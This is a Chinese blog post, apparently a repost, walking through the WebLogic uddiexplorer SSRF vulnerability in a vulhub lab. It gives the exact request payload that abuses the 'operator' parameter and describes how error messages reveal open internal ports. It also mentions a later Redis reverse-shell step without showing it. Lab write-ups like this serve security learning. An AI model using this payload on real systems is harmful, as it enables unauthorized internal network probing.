【研究】weblogic漏洞系列-SSRF漏洞

1.环境

环境
https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md
这个搭环境很方便快捷,具体可以看说明,很简单

2.原理

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
访问http://ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer

3.影响版本

4.利用过程

环境打开

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,直接访问

在这里插入图片描述

payload:
?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

加入url

http://10.77.0.130:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

`

关键点是operator这个参数

  • 可访问的端口将会得到错误,访问7001端口时返回一个404的状态码。
  • 修改为一个不存在的端口,将会返回could not connect over HTTP to server

存在
在这里插入图片描述
不存在
在这里插入图片描述
内网端口探测

我们可以根据返回的不同状态信息,来判断内网的IP是否存在以及对应端口是否开放。这里有一个地方需要注意的是,需要知道目标内网网段。如果盲目的去进行网段扫描会耗费大量的时间。

实战挖掘中发现这个位置有可能会泄露内网网段。

实战存在的情况
在这里插入图片描述

注入HTTP头,利用Redis反弹shell

下一遍分开写吧,是可以的

发布了46 篇原创文章 · 获赞 12 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/god_zzZ/article/details/99637485